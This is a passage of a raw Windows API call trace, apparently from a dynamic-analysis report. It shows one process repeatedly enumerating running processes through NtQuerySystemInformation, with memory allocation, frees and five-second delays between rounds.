ResultLength=0x0) returned 0x0 [0146.044] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0146.046] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0146.048] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0146.048] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0146.049] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0146.051] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0146.052] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0146.059] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0146.060] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0146.063] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0146.063] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0146.064] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0146.065] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0146.065] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0146.070] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0146.100] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0146.193] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0146.193] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0146.195] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0146.196] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0146.196] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0146.202] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0146.203] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0146.269] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0146.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0146.271] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0146.271] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0146.272] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0146.276] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0146.277] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0146.281] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0146.282] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0146.283] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0146.283] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0146.283] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0146.289] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0146.289] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0146.293] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0146.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0146.294] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0146.294] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0146.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0146.299] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0146.300] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0146.306] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0146.306] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0146.307] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0146.308] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0146.308] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0146.313] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0146.314] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0146.319] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0146.320] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0146.321] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0146.321] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0146.322] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0146.326] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0146.327] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0146.332] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0146.332] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0146.333] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0146.334] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0146.334] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0146.338] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0146.339] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0146.343] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0146.343] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0146.349] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0146.350] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0146.350] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0146.430] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0146.431] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0146.532] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0146.533] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0146.534] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0146.534] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0146.534] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0146.538] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0146.539] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0146.600] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0146.601] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0146.602] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0146.602] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0146.602] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0146.606] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0146.606] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0146.648] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0146.649] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0146.650] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0146.650] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0146.651] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0146.655] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0146.657] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0146.668] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0146.669] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0146.670] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0146.671] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0146.671] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0146.677] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0146.679] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0146.694] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0146.695] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0146.696] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0146.697] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0146.699] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0146.704] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0146.705] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0146.710] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0146.710] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0146.711] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0146.711] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0146.712] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0146.715] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0146.718] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0146.722] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0146.722] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0146.723] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0146.724] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0146.724] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0146.729] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0146.739] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0146.744] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0146.744] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0146.745] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0146.746] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0146.746] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0146.750] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0146.751] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0146.894] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0146.895] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0146.903] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0146.904] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0146.905] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0146.909] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0146.910] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0146.918] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0146.919] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0146.919] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0146.920] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0146.920] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0146.923] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0146.924] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0146.933] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0146.933] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0146.934] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0146.934] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0146.934] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0146.938] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0146.938] NtDelayExecution (Alertable=0, 